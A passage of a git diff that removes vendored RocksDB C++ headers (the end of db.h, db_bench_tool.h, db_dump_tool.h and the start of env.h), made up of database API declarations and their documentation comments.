-    //      live data in bytes.
-    static const std::string kEstimateLiveDataSize;
-
-    //  "rocksdb.min-log-number-to-keep" - return the minimum log number of the
-    //      log files that should be kept.
-    static const std::string kMinLogNumberToKeep;
-
-    //  "rocksdb.total-sst-files-size" - returns total size (bytes) of all SST
-    //      files.
-    //  WARNING: may slow down online queries if there are too many files.
-    static const std::string kTotalSstFilesSize;
-
-    //  "rocksdb.base-level" - returns number of level to which L0 data will be
-    //      compacted.
-    static const std::string kBaseLevel;
-
-    //  "rocksdb.estimate-pending-compaction-bytes" - returns estimated total
-    //      number of bytes compaction needs to rewrite to get all levels down
-    //      to under target size. Not valid for other compactions than level-
-    //      based.
-    static const std::string kEstimatePendingCompactionBytes;
-
-    //  "rocksdb.aggregated-table-properties" - returns a string representation
-    //      of the aggregated table properties of the target column family.
-    static const std::string kAggregatedTableProperties;
-
-    //  "rocksdb.aggregated-table-properties-at-level<N>", same as the previous
-    //      one but only returns the aggregated table properties of the
-    //      specified level "N" at the target column family.
-    static const std::string kAggregatedTablePropertiesAtLevel;
-
-    //  "rocksdb.actual-delayed-write-rate" - returns the current actual delayed
-    //      write rate. 0 means no delay.
-    static const std::string kActualDelayedWriteRate;
-
-    //  "rocksdb.is-write-stopped" - Return 1 if write has been stopped.
-    static const std::string kIsWriteStopped;
-
-    //  "rocksdb.estimate-oldest-key-time" - returns an estimation of
-    //      oldest key timestamp in the DB. Currently only available for
-    //      FIFO compaction with
-    //      compaction_options_fifo.allow_compaction = false.
-    static const std::string kEstimateOldestKeyTime;
-  };
-#endif /* ROCKSDB_LITE */
-
-  // DB implementations can export properties about their state via this method.
-  // If "property" is a valid property understood by this DB implementation (see
-  // Properties struct above for valid options), fills "*value" with its current
-  // value and returns true.  Otherwise, returns false.
-  virtual bool GetProperty(ColumnFamilyHandle* column_family,
-                           const Slice& property, std::string* value) = 0;
-  virtual bool GetProperty(const Slice& property, std::string* value) {
-    return GetProperty(DefaultColumnFamily(), property, value);
-  }
-  virtual bool GetMapProperty(ColumnFamilyHandle* column_family,
-                              const Slice& property,
-                              std::map<std::string, double>* value) = 0;
-  virtual bool GetMapProperty(const Slice& property,
-                              std::map<std::string, double>* value) {
-    return GetMapProperty(DefaultColumnFamily(), property, value);
-  }
-
-  // Similar to GetProperty(), but only works for a subset of properties whose
-  // return value is an integer. Return the value by integer. Supported
-  // properties:
-  //  "rocksdb.num-immutable-mem-table"
-  //  "rocksdb.mem-table-flush-pending"
-  //  "rocksdb.compaction-pending"
-  //  "rocksdb.background-errors"
-  //  "rocksdb.cur-size-active-mem-table"
-  //  "rocksdb.cur-size-all-mem-tables"
-  //  "rocksdb.size-all-mem-tables"
-  //  "rocksdb.num-entries-active-mem-table"
-  //  "rocksdb.num-entries-imm-mem-tables"
-  //  "rocksdb.num-deletes-active-mem-table"
-  //  "rocksdb.num-deletes-imm-mem-tables"
-  //  "rocksdb.estimate-num-keys"
-  //  "rocksdb.estimate-table-readers-mem"
-  //  "rocksdb.is-file-deletions-enabled"
-  //  "rocksdb.num-snapshots"
-  //  "rocksdb.oldest-snapshot-time"
-  //  "rocksdb.num-live-versions"
-  //  "rocksdb.current-super-version-number"
-  //  "rocksdb.estimate-live-data-size"
-  //  "rocksdb.min-log-number-to-keep"
-  //  "rocksdb.total-sst-files-size"
-  //  "rocksdb.base-level"
-  //  "rocksdb.estimate-pending-compaction-bytes"
-  //  "rocksdb.num-running-compactions"
-  //  "rocksdb.num-running-flushes"
-  //  "rocksdb.actual-delayed-write-rate"
-  //  "rocksdb.is-write-stopped"
-  //  "rocksdb.estimate-oldest-key-time"
-  virtual bool GetIntProperty(ColumnFamilyHandle* column_family,
-                              const Slice& property, uint64_t* value) = 0;
-  virtual bool GetIntProperty(const Slice& property, uint64_t* value) {
-    return GetIntProperty(DefaultColumnFamily(), property, value);
-  }
-
-  // Reset internal stats for DB and all column families.
-  // Note this doesn't reset options.statistics as it is not owned by
-  // DB.
-  virtual Status ResetStats() {
-    return Status::NotSupported("Not implemented");
-  }
-
-  // Same as GetIntProperty(), but this one returns the aggregated int
-  // property from all column families.
-  virtual bool GetAggregatedIntProperty(const Slice& property,
-                                        uint64_t* value) = 0;
-
-  // Flags for DB::GetSizeApproximation that specify whether memtable
-  // stats should be included, or file stats approximation or both
-  enum SizeApproximationFlags : uint8_t {
-    NONE = 0,
-    INCLUDE_MEMTABLES = 1,
-    INCLUDE_FILES = 1 << 1
-  };
-
-  // For each i in [0,n-1], store in "sizes[i]", the approximate
-  // file system space used by keys in "[range[i].start .. range[i].limit)".
-  //
-  // Note that the returned sizes measure file system space usage, so
-  // if the user data compresses by a factor of ten, the returned
-  // sizes will be one-tenth the size of the corresponding user data size.
-  //
-  // If include_flags defines whether the returned size should include
-  // the recently written data in the mem-tables (if
-  // the mem-table type supports it), data serialized to disk, or both.
-  // include_flags should be of type DB::SizeApproximationFlags
-  virtual void GetApproximateSizes(ColumnFamilyHandle* column_family,
-                                   const Range* range, int n, uint64_t* sizes,
-                                   uint8_t include_flags
-                                   = INCLUDE_FILES) = 0;
-  virtual void GetApproximateSizes(const Range* range, int n, uint64_t* sizes,
-                                   uint8_t include_flags
-                                   = INCLUDE_FILES) {
-    GetApproximateSizes(DefaultColumnFamily(), range, n, sizes,
-                        include_flags);
-  }
-
-  // The method is similar to GetApproximateSizes, except it
-  // returns approximate number of records in memtables.
-  virtual void GetApproximateMemTableStats(ColumnFamilyHandle* column_family,
-                                           const Range& range,
-                                           uint64_t* const count,
-                                           uint64_t* const size) = 0;
-  virtual void GetApproximateMemTableStats(const Range& range,
-                                           uint64_t* const count,
-                                           uint64_t* const size) {
-    GetApproximateMemTableStats(DefaultColumnFamily(), range, count, size);
-  }
-
-  // Deprecated versions of GetApproximateSizes
-  ROCKSDB_DEPRECATED_FUNC virtual void GetApproximateSizes(
-      const Range* range, int n, uint64_t* sizes,
-      bool include_memtable) {
-    uint8_t include_flags = SizeApproximationFlags::INCLUDE_FILES;
-    if (include_memtable) {
-      include_flags |= SizeApproximationFlags::INCLUDE_MEMTABLES;
-    }
-    GetApproximateSizes(DefaultColumnFamily(), range, n, sizes, include_flags);
-  }
-  ROCKSDB_DEPRECATED_FUNC virtual void GetApproximateSizes(
-      ColumnFamilyHandle* column_family,
-      const Range* range, int n, uint64_t* sizes,
-      bool include_memtable) {
-    uint8_t include_flags = SizeApproximationFlags::INCLUDE_FILES;
-    if (include_memtable) {
-      include_flags |= SizeApproximationFlags::INCLUDE_MEMTABLES;
-    }
-    GetApproximateSizes(column_family, range, n, sizes, include_flags);
-  }
-
-  // Compact the underlying storage for the key range [*begin,*end].
-  // The actual compaction interval might be superset of [*begin, *end].
-  // In particular, deleted and overwritten versions are discarded,
-  // and the data is rearranged to reduce the cost of operations
-  // needed to access the data.  This operation should typically only
-  // be invoked by users who understand the underlying implementation.
-  //
-  // begin==nullptr is treated as a key before all keys in the database.
-  // end==nullptr is treated as a key after all keys in the database.
-  // Therefore the following call will compact the entire database:
-  //    db->CompactRange(options, nullptr, nullptr);
-  // Note that after the entire database is compacted, all data are pushed
-  // down to the last level containing any data. If the total data size after
-  // compaction is reduced, that level might not be appropriate for hosting all
-  // the files. In this case, client could set options.change_level to true, to
-  // move the files back to the minimum level capable of holding the data set
-  // or a given level (specified by non-negative options.target_level).
-  virtual Status CompactRange(const CompactRangeOptions& options,
-                              ColumnFamilyHandle* column_family,
-                              const Slice* begin, const Slice* end) = 0;
-  virtual Status CompactRange(const CompactRangeOptions& options,
-                              const Slice* begin, const Slice* end) {
-    return CompactRange(options, DefaultColumnFamily(), begin, end);
-  }
-
-  ROCKSDB_DEPRECATED_FUNC virtual Status CompactRange(
-      ColumnFamilyHandle* column_family, const Slice* begin, const Slice* end,
-      bool change_level = false, int target_level = -1,
-      uint32_t target_path_id = 0) {
-    CompactRangeOptions options;
-    options.change_level = change_level;
-    options.target_level = target_level;
-    options.target_path_id = target_path_id;
-    return CompactRange(options, column_family, begin, end);
-  }
-
-  ROCKSDB_DEPRECATED_FUNC virtual Status CompactRange(
-      const Slice* begin, const Slice* end, bool change_level = false,
-      int target_level = -1, uint32_t target_path_id = 0) {
-    CompactRangeOptions options;
-    options.change_level = change_level;
-    options.target_level = target_level;
-    options.target_path_id = target_path_id;
-    return CompactRange(options, DefaultColumnFamily(), begin, end);
-  }
-
-  virtual Status SetOptions(
-      ColumnFamilyHandle* /*column_family*/,
-      const std::unordered_map<std::string, std::string>& /*new_options*/) {
-    return Status::NotSupported("Not implemented");
-  }
-  virtual Status SetOptions(
-      const std::unordered_map<std::string, std::string>& new_options) {
-    return SetOptions(DefaultColumnFamily(), new_options);
-  }
-
-  virtual Status SetDBOptions(
-      const std::unordered_map<std::string, std::string>& new_options) = 0;
-
-  // CompactFiles() inputs a list of files specified by file numbers and
-  // compacts them to the specified level. Note that the behavior is different
-  // from CompactRange() in that CompactFiles() performs the compaction job
-  // using the CURRENT thread.
-  //
-  // @see GetDataBaseMetaData
-  // @see GetColumnFamilyMetaData
-  virtual Status CompactFiles(
-      const CompactionOptions& compact_options,
-      ColumnFamilyHandle* column_family,
-      const std::vector<std::string>& input_file_names,
-      const int output_level, const int output_path_id = -1) = 0;
-
-  virtual Status CompactFiles(
-      const CompactionOptions& compact_options,
-      const std::vector<std::string>& input_file_names,
-      const int output_level, const int output_path_id = -1) {
-    return CompactFiles(compact_options, DefaultColumnFamily(),
-                        input_file_names, output_level, output_path_id);
-  }
-
-  // This function will wait until all currently running background processes
-  // finish. After it returns, no background process will be run until
-  // UnblockBackgroundWork is called
-  virtual Status PauseBackgroundWork() = 0;
-  virtual Status ContinueBackgroundWork() = 0;
-
-  // This function will enable automatic compactions for the given column
-  // families if they were previously disabled. The function will first set the
-  // disable_auto_compactions option for each column family to 'false', after
-  // which it will schedule a flush/compaction.
-  //
-  // NOTE: Setting disable_auto_compactions to 'false' through SetOptions() API
-  // does NOT schedule a flush/compaction afterwards, and only changes the
-  // parameter itself within the column family option.
-  //
-  virtual Status EnableAutoCompaction(
-      const std::vector<ColumnFamilyHandle*>& column_family_handles) = 0;
-
-  // Number of levels used for this DB.
-  virtual int NumberLevels(ColumnFamilyHandle* column_family) = 0;
-  virtual int NumberLevels() { return NumberLevels(DefaultColumnFamily()); }
-
-  // Maximum level to which a new compacted memtable is pushed if it
-  // does not create overlap.
-  virtual int MaxMemCompactionLevel(ColumnFamilyHandle* column_family) = 0;
-  virtual int MaxMemCompactionLevel() {
-    return MaxMemCompactionLevel(DefaultColumnFamily());
-  }
-
-  // Number of files in level-0 that would stop writes.
-  virtual int Level0StopWriteTrigger(ColumnFamilyHandle* column_family) = 0;
-  virtual int Level0StopWriteTrigger() {
-    return Level0StopWriteTrigger(DefaultColumnFamily());
-  }
-
-  // Get DB name -- the exact same name that was provided as an argument to
-  // DB::Open()
-  virtual const std::string& GetName() const = 0;
-
-  // Get Env object from the DB
-  virtual Env* GetEnv() const = 0;
-
-  // Get DB Options that we use.  During the process of opening the
-  // column family, the options provided when calling DB::Open() or
-  // DB::CreateColumnFamily() will have been "sanitized" and transformed
-  // in an implementation-defined manner.
-  virtual Options GetOptions(ColumnFamilyHandle* column_family) const = 0;
-  virtual Options GetOptions() const {
-    return GetOptions(DefaultColumnFamily());
-  }
-
-  virtual DBOptions GetDBOptions() const = 0;
-
-  // Flush all mem-table data.
-  virtual Status Flush(const FlushOptions& options,
-                       ColumnFamilyHandle* column_family) = 0;
-  virtual Status Flush(const FlushOptions& options) {
-    return Flush(options, DefaultColumnFamily());
-  }
-
-  // Flush the WAL memory buffer to the file. If sync is true, it calls SyncWAL
-  // afterwards.
-  virtual Status FlushWAL(bool sync) {
-    return Status::NotSupported("FlushWAL not implemented");
-  }
-  // Sync the wal. Note that Write() followed by SyncWAL() is not exactly the
-  // same as Write() with sync=true: in the latter case the changes won't be
-  // visible until the sync is done.
-  // Currently only works if allow_mmap_writes = false in Options.
-  virtual Status SyncWAL() = 0;
-
-  // The sequence number of the most recent transaction.
-  virtual SequenceNumber GetLatestSequenceNumber() const = 0;
-
-#ifndef ROCKSDB_LITE
-
-  // Prevent file deletions. Compactions will continue to occur,
-  // but no obsolete files will be deleted. Calling this multiple
-  // times have the same effect as calling it once.
-  virtual Status DisableFileDeletions() = 0;
-
-  // Allow compactions to delete obsolete files.
-  // If force == true, the call to EnableFileDeletions() will guarantee that
-  // file deletions are enabled after the call, even if DisableFileDeletions()
-  // was called multiple times before.
-  // If force == false, EnableFileDeletions will only enable file deletion
-  // after it's been called at least as many times as DisableFileDeletions(),
-  // enabling the two methods to be called by two threads concurrently without
-  // synchronization -- i.e., file deletions will be enabled only after both
-  // threads call EnableFileDeletions()
-  virtual Status EnableFileDeletions(bool force = true) = 0;
-
-  // GetLiveFiles followed by GetSortedWalFiles can generate a lossless backup
-
-  // Retrieve the list of all files in the database. The files are
-  // relative to the dbname and are not absolute paths. The valid size of the
-  // manifest file is returned in manifest_file_size. The manifest file is an
-  // ever growing file, but only the portion specified by manifest_file_size is
-  // valid for this snapshot.
-  // Setting flush_memtable to true does Flush before recording the live files.
-  // Setting flush_memtable to false is useful when we don't want to wait for
-  // flush which may have to wait for compaction to complete taking an
-  // indeterminate time.
-  //
-  // In case you have multiple column families, even if flush_memtable is true,
-  // you still need to call GetSortedWalFiles after GetLiveFiles to compensate
-  // for new data that arrived to already-flushed column families while other
-  // column families were flushing
-  virtual Status GetLiveFiles(std::vector<std::string>&,
-                              uint64_t* manifest_file_size,
-                              bool flush_memtable = true) = 0;
-
-  // Retrieve the sorted list of all wal files with earliest file first
-  virtual Status GetSortedWalFiles(VectorLogPtr& files) = 0;
-
-  // Sets iter to an iterator that is positioned at a write-batch containing
-  // seq_number. If the sequence number is non existent, it returns an iterator
-  // at the first available seq_no after the requested seq_no
-  // Returns Status::OK if iterator is valid
-  // Must set WAL_ttl_seconds or WAL_size_limit_MB to large values to
-  // use this api, else the WAL files will get
-  // cleared aggressively and the iterator might keep getting invalid before
-  // an update is read.
-  virtual Status GetUpdatesSince(
-      SequenceNumber seq_number, unique_ptr<TransactionLogIterator>* iter,
-      const TransactionLogIterator::ReadOptions&
-          read_options = TransactionLogIterator::ReadOptions()) = 0;
-
-// Windows API macro interference
-#undef DeleteFile
-  // Delete the file name from the db directory and update the internal state to
-  // reflect that. Supports deletion of sst and log files only. 'name' must be
-  // path relative to the db directory. eg. 000001.sst, /archive/000003.log
-  virtual Status DeleteFile(std::string name) = 0;
-
-  // Returns a list of all table files with their level, start key
-  // and end key
-  virtual void GetLiveFilesMetaData(
-      std::vector<LiveFileMetaData>* /*metadata*/) {}
-
-  // Obtains the meta data of the specified column family of the DB.
-  // Status::NotFound() will be returned if the current DB does not have
-  // any column family match the specified name.
-  //
-  // If cf_name is not specified, then the metadata of the default
-  // column family will be returned.
-  virtual void GetColumnFamilyMetaData(ColumnFamilyHandle* /*column_family*/,
-                                       ColumnFamilyMetaData* /*metadata*/) {}
-
-  // Get the metadata of the default column family.
-  void GetColumnFamilyMetaData(
-      ColumnFamilyMetaData* metadata) {
-    GetColumnFamilyMetaData(DefaultColumnFamily(), metadata);
-  }
-
-  // IngestExternalFile() will load a list of external SST files (1) into the DB
-  // Two primary modes are supported:
-  // - Duplicate keys in the new files will overwrite exiting keys (default)
-  // - Duplicate keys will be skipped (set ingest_behind=true)
-  // In the first mode we will try to find the lowest possible level that
-  // the file can fit in, and ingest the file into this level (2). A file that
-  // have a key range that overlap with the memtable key range will require us
-  // to Flush the memtable first before ingesting the file.
-  // In the second mode we will always ingest in the bottom mode level (see
-  // docs to IngestExternalFileOptions::ingest_behind).
-  //
-  // (1) External SST files can be created using SstFileWriter
-  // (2) We will try to ingest the files to the lowest possible level
-  //     even if the file compression doesn't match the level compression
-  // (3) If IngestExternalFileOptions->ingest_behind is set to true,
-  //     we always ingest at the bottommost level, which should be reserved
-  //     for this purpose (see DBOPtions::allow_ingest_behind flag).
-  virtual Status IngestExternalFile(
-      ColumnFamilyHandle* column_family,
-      const std::vector<std::string>& external_files,
-      const IngestExternalFileOptions& options) = 0;
-
-  virtual Status IngestExternalFile(
-      const std::vector<std::string>& external_files,
-      const IngestExternalFileOptions& options) {
-    return IngestExternalFile(DefaultColumnFamily(), external_files, options);
-  }
-
-  virtual Status VerifyChecksum() = 0;
-
-  // AddFile() is deprecated, please use IngestExternalFile()
-  ROCKSDB_DEPRECATED_FUNC virtual Status AddFile(
-      ColumnFamilyHandle* column_family,
-      const std::vector<std::string>& file_path_list, bool move_file = false,
-      bool skip_snapshot_check = false) {
-    IngestExternalFileOptions ifo;
-    ifo.move_files = move_file;
-    ifo.snapshot_consistency = !skip_snapshot_check;
-    ifo.allow_global_seqno = false;
-    ifo.allow_blocking_flush = false;
-    return IngestExternalFile(column_family, file_path_list, ifo);
-  }
-
-  ROCKSDB_DEPRECATED_FUNC virtual Status AddFile(
-      const std::vector<std::string>& file_path_list, bool move_file = false,
-      bool skip_snapshot_check = false) {
-    IngestExternalFileOptions ifo;
-    ifo.move_files = move_file;
-    ifo.snapshot_consistency = !skip_snapshot_check;
-    ifo.allow_global_seqno = false;
-    ifo.allow_blocking_flush = false;
-    return IngestExternalFile(DefaultColumnFamily(), file_path_list, ifo);
-  }
-
-  // AddFile() is deprecated, please use IngestExternalFile()
-  ROCKSDB_DEPRECATED_FUNC virtual Status AddFile(
-      ColumnFamilyHandle* column_family, const std::string& file_path,
-      bool move_file = false, bool skip_snapshot_check = false) {
-    IngestExternalFileOptions ifo;
-    ifo.move_files = move_file;
-    ifo.snapshot_consistency = !skip_snapshot_check;
-    ifo.allow_global_seqno = false;
-    ifo.allow_blocking_flush = false;
-    return IngestExternalFile(column_family, {file_path}, ifo);
-  }
-
-  ROCKSDB_DEPRECATED_FUNC virtual Status AddFile(
-      const std::string& file_path, bool move_file = false,
-      bool skip_snapshot_check = false) {
-    IngestExternalFileOptions ifo;
-    ifo.move_files = move_file;
-    ifo.snapshot_consistency = !skip_snapshot_check;
-    ifo.allow_global_seqno = false;
-    ifo.allow_blocking_flush = false;
-    return IngestExternalFile(DefaultColumnFamily(), {file_path}, ifo);
-  }
-
-  // Load table file with information "file_info" into "column_family"
-  ROCKSDB_DEPRECATED_FUNC virtual Status AddFile(
-      ColumnFamilyHandle* column_family,
-      const std::vector<ExternalSstFileInfo>& file_info_list,
-      bool move_file = false, bool skip_snapshot_check = false) {
-    std::vector<std::string> external_files;
-    for (const ExternalSstFileInfo& file_info : file_info_list) {
-      external_files.push_back(file_info.file_path);
-    }
-    IngestExternalFileOptions ifo;
-    ifo.move_files = move_file;
-    ifo.snapshot_consistency = !skip_snapshot_check;
-    ifo.allow_global_seqno = false;
-    ifo.allow_blocking_flush = false;
-    return IngestExternalFile(column_family, external_files, ifo);
-  }
-
-  ROCKSDB_DEPRECATED_FUNC virtual Status AddFile(
-      const std::vector<ExternalSstFileInfo>& file_info_list,
-      bool move_file = false, bool skip_snapshot_check = false) {
-    std::vector<std::string> external_files;
-    for (const ExternalSstFileInfo& file_info : file_info_list) {
-      external_files.push_back(file_info.file_path);
-    }
-    IngestExternalFileOptions ifo;
-    ifo.move_files = move_file;
-    ifo.snapshot_consistency = !skip_snapshot_check;
-    ifo.allow_global_seqno = false;
-    ifo.allow_blocking_flush = false;
-    return IngestExternalFile(DefaultColumnFamily(), external_files, ifo);
-  }
-
-  ROCKSDB_DEPRECATED_FUNC virtual Status AddFile(
-      ColumnFamilyHandle* column_family, const ExternalSstFileInfo* file_info,
-      bool move_file = false, bool skip_snapshot_check = false) {
-    IngestExternalFileOptions ifo;
-    ifo.move_files = move_file;
-    ifo.snapshot_consistency = !skip_snapshot_check;
-    ifo.allow_global_seqno = false;
-    ifo.allow_blocking_flush = false;
-    return IngestExternalFile(column_family, {file_info->file_path}, ifo);
-  }
-
-  ROCKSDB_DEPRECATED_FUNC virtual Status AddFile(
-      const ExternalSstFileInfo* file_info, bool move_file = false,
-      bool skip_snapshot_check = false) {
-    IngestExternalFileOptions ifo;
-    ifo.move_files = move_file;
-    ifo.snapshot_consistency = !skip_snapshot_check;
-    ifo.allow_global_seqno = false;
-    ifo.allow_blocking_flush = false;
-    return IngestExternalFile(DefaultColumnFamily(), {file_info->file_path},
-                              ifo);
-  }
-
-#endif  // ROCKSDB_LITE
-
-  // Sets the globally unique ID created at database creation time by invoking
-  // Env::GenerateUniqueId(), in identity. Returns Status::OK if identity could
-  // be set properly
-  virtual Status GetDbIdentity(std::string& identity) const = 0;
-
-  // Returns default column family handle
-  virtual ColumnFamilyHandle* DefaultColumnFamily() const = 0;
-
-#ifndef ROCKSDB_LITE
-  virtual Status GetPropertiesOfAllTables(ColumnFamilyHandle* column_family,
-                                          TablePropertiesCollection* props) = 0;
-  virtual Status GetPropertiesOfAllTables(TablePropertiesCollection* props) {
-    return GetPropertiesOfAllTables(DefaultColumnFamily(), props);
-  }
-  virtual Status GetPropertiesOfTablesInRange(
-      ColumnFamilyHandle* column_family, const Range* range, std::size_t n,
-      TablePropertiesCollection* props) = 0;
-
-  virtual Status SuggestCompactRange(ColumnFamilyHandle* column_family,
-                                     const Slice* begin, const Slice* end) {
-    return Status::NotSupported("SuggestCompactRange() is not implemented.");
-  }
-
-  virtual Status PromoteL0(ColumnFamilyHandle* column_family,
-                           int target_level) {
-    return Status::NotSupported("PromoteL0() is not implemented.");
-  }
-
-#endif  // ROCKSDB_LITE
-
-  // Needed for StackableDB
-  virtual DB* GetRootDB() { return this; }
-
- private:
-  // No copying allowed
-  DB(const DB&);
-  void operator=(const DB&);
-};
-
-// Destroy the contents of the specified database.
-// Be very careful using this method.
-Status DestroyDB(const std::string& name, const Options& options);
-
-#ifndef ROCKSDB_LITE
-// If a DB cannot be opened, you may attempt to call this method to
-// resurrect as much of the contents of the database as possible.
-// Some data may be lost, so be careful when calling this function
-// on a database that contains important information.
-//
-// With this API, we will warn and skip data associated with column families not
-// specified in column_families.
-//
-// @param column_families Descriptors for known column families
-Status RepairDB(const std::string& dbname, const DBOptions& db_options,
-                const std::vector<ColumnFamilyDescriptor>& column_families);
-
-// @param unknown_cf_opts Options for column families encountered during the
-//                        repair that were not specified in column_families.
-Status RepairDB(const std::string& dbname, const DBOptions& db_options,
-                const std::vector<ColumnFamilyDescriptor>& column_families,
-                const ColumnFamilyOptions& unknown_cf_opts);
-
-// @param options These options will be used for the database and for ALL column
-//                families encountered during the repair
-Status RepairDB(const std::string& dbname, const Options& options);
-
-#endif
-
-}  // namespace rocksdb
-
-#endif  // STORAGE_ROCKSDB_INCLUDE_DB_H_
diff --git a/thirdparty/rocksdb/include/rocksdb/db_bench_tool.h b/thirdparty/rocksdb/include/rocksdb/db_bench_tool.h
deleted file mode 100644
index 047c425..0000000
--- a/thirdparty/rocksdb/include/rocksdb/db_bench_tool.h
+++ /dev/null
@@ -1,9 +0,0 @@
-// Copyright (c) 2013-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-
-namespace rocksdb {
-int db_bench_tool(int argc, char** argv);
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/include/rocksdb/db_dump_tool.h b/thirdparty/rocksdb/include/rocksdb/db_dump_tool.h
deleted file mode 100644
index cb9a265..0000000
--- a/thirdparty/rocksdb/include/rocksdb/db_dump_tool.h
+++ /dev/null
@@ -1,45 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#ifndef ROCKSDB_LITE
-
-#include <string>
-
-#include "rocksdb/db.h"
-
-namespace rocksdb {
-
-struct DumpOptions {
-  // Database that will be dumped
-  std::string db_path;
-  // File location that will contain dump output
-  std::string dump_location;
-  // Dont include db information header in the dump
-  bool anonymous = false;
-};
-
-class DbDumpTool {
- public:
-  bool Run(const DumpOptions& dump_options,
-           rocksdb::Options options = rocksdb::Options());
-};
-
-struct UndumpOptions {
-  // Database that we will load the dumped file into
-  std::string db_path;
-  // File location of the dumped file that will be loaded
-  std::string dump_location;
-  // Compact the db after loading the dumped file
-  bool compact_db = false;
-};
-
-class DbUndumpTool {
- public:
-  bool Run(const UndumpOptions& undump_options,
-           rocksdb::Options options = rocksdb::Options());
-};
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/include/rocksdb/env.h b/thirdparty/rocksdb/include/rocksdb/env.h
deleted file mode 100644
index 709d503..0000000
--- a/thirdparty/rocksdb/include/rocksdb/env.h
+++ /dev/null
@@ -1,1137 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// An Env is an interface used by the rocksdb implementation to access
-// operating system functionality like the filesystem etc.  Callers
-// may wish to provide a custom Env object when opening a database to
-// get fine gain control; e.g., to rate limit file system operations.
-//
-// All Env implementations are safe for concurrent access from
-// multiple threads without any external synchronization.
-
-#ifndef STORAGE_ROCKSDB_INCLUDE_ENV_H_
-#define STORAGE_ROCKSDB_INCLUDE_ENV_H_
-
-#include <stdint.h>
-#include <cstdarg>
-#include <functional>
-#include <limits>
-#include <memory>
-#include <string>
-#include <vector>
-#include "rocksdb/status.h"
-#include "rocksdb/thread_status.h"
-
-#ifdef _WIN32
-// Windows API macro interference
-#undef DeleteFile
-#undef GetCurrentTime
-#endif
-
-namespace rocksdb {
-
-class FileLock;
-class Logger;
-class RandomAccessFile;
-class SequentialFile;
-class Slice;
-class WritableFile;
-class RandomRWFile;
-class Directory;
-struct DBOptions;
-struct ImmutableDBOptions;
-class RateLimiter;
-class ThreadStatusUpdater;
-struct ThreadStatus;
-
-using std::unique_ptr;
-using std::shared_ptr;
-
-const size_t kDefaultPageSize = 4 * 1024;
-
-// Options while opening a file to read/write
-struct EnvOptions {
-
-  // Construct with default Options
-  EnvOptions();
-
-  // Construct from Options
-  explicit EnvOptions(const DBOptions& options);
-
-   // If true, then use mmap to read data
-  bool use_mmap_reads = false;
-
-   // If true, then use mmap to write data
-  bool use_mmap_writes = true;
-
-  // If true, then use O_DIRECT for reading data
-  bool use_direct_reads = false;
-
-  // If true, then use O_DIRECT for writing data
-  bool use_direct_writes = false;
-
-  // If false, fallocate() calls are bypassed
-  bool allow_fallocate = true;
-
-  // If true, set the FD_CLOEXEC on open fd.
-  bool set_fd_cloexec = true;
-
-  // Allows OS to incrementally sync files to disk while they are being
-  // written, in the background. Issue one request for every bytes_per_sync
-  // written. 0 turns it off.
-  // Default: 0
-  uint64_t bytes_per_sync = 0;
-
-  // If true, we will preallocate the file with FALLOC_FL_KEEP_SIZE flag, which
-  // means that file size won't change as part of preallocation.
-  // If false, preallocation will also change the file size. This option will
-  // improve the performance in workloads where you sync the data on every
-  // write. By default, we set it to true for MANIFEST writes and false for
-  // WAL writes
-  bool fallocate_with_keep_size = true;
-
-  // See DBOptions doc
-  size_t compaction_readahead_size;
-
-  // See DBOptions doc
-  size_t random_access_max_buffer_size;
-
-  // See DBOptions doc
-  size_t writable_file_max_buffer_size = 1024 * 1024;
-
-  // If not nullptr, write rate limiting is enabled for flush and compaction
-  RateLimiter* rate_limiter = nullptr;
-};
-
-class Env {
- public:
-  struct FileAttributes {
-    // File name
-    std::string name;
-
-    // Size of file in bytes
-    uint64_t size_bytes;
-  };
-
-  Env() : thread_status_updater_(nullptr) {}
-
-  virtual ~Env();
-
-  // Return a default environment suitable for the current operating
-  // system.  Sophisticated users may wish to provide their own Env
-  // implementation instead of relying on this default environment.
-  //
-  // The result of Default() belongs to rocksdb and must never be deleted.
-  static Env* Default();
-
-  // Create a brand new sequentially-readable file with the specified name.
-  // On success, stores a pointer to the new file in *result and returns OK.
-  // On failure stores nullptr in *result and returns non-OK.  If the file does
-  // not exist, returns a non-OK status.
-  //
-  // The returned file will only be accessed by one thread at a time.
-  virtual Status NewSequentialFile(const std::string& fname,
-                                   unique_ptr<SequentialFile>* result,
-                                   const EnvOptions& options)
-                                   = 0;
-
-  // Create a brand new random access read-only file with the
-  // specified name.  On success, stores a pointer to the new file in
-  // *result and returns OK.  On failure stores nullptr in *result and
-  // returns non-OK.  If the file does not exist, returns a non-OK
-  // status.
-  //
-  // The returned file may be concurrently accessed by multiple threads.
-  virtual Status NewRandomAccessFile(const std::string& fname,
-                                     unique_ptr<RandomAccessFile>* result,
-                                     const EnvOptions& options)
-                                     = 0;
-
-  // Create an object that writes to a new file with the specified
-  // name.  Deletes any existing file with the same name and creates a
-  // new file.  On success, stores a pointer to the new file in
-  // *result and returns OK.  On failure stores nullptr in *result and
-  // returns non-OK.
-  //
-  // The returned file will only be accessed by one thread at a time.
-  virtual Status NewWritableFile(const std::string& fname,
-                                 unique_ptr<WritableFile>* result,
-                                 const EnvOptions& options) = 0;
-
-  // Create an object that writes to a new file with the specified
-  // name.  Deletes any existing file with the same name and creates a
-  // new file.  On success, stores a pointer to the new file in
-  // *result and returns OK.  On failure stores nullptr in *result and
-  // returns non-OK.
-  //
-  // The returned file will only be accessed by one thread at a time.
-  virtual Status ReopenWritableFile(const std::string& fname,
-                                    unique_ptr<WritableFile>* result,
-                                    const EnvOptions& options) {
-    return Status::NotSupported();
-  }
-
-  // Reuse an existing file by renaming it and opening it as writable.
-  virtual Status ReuseWritableFile(const std::string& fname,
-                                   const std::string& old_fname,
